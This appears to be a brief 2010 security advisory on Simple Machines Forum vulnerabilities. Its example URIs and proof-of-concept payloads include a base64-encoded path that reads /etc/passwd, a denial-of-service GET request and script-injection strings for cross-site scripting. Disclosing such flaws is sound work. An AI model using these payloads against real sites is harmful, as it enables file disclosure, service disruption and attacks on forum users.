Simple Machines Forum Multiple Security Vulnerabilities

An attacker can use a browser to exploit these issues. To exploit the cross-site scripting and cross-site request-forgery vulnerabilities, the attacker must entice an unsuspecting victim into following a malicious URI.

The following example URIs are available:

Information disclosure:;area=logs;sa=errorlog;file=L2V0Yy9wYXNzd2Q==

Denial of service:
GET /.xml.html;sa=news;limit=999;type=rss HTTP/1.1

Denial of service (cookie):

Cross-site scripting:;area=languages;sa=add;[token]
PoC: "><xss>;area=theme;sa=settings;th=2;[token]
PoC: http://urlreal"><script>alert(1);</script>


Privacy Statement
Copyright 2010, SecurityFocus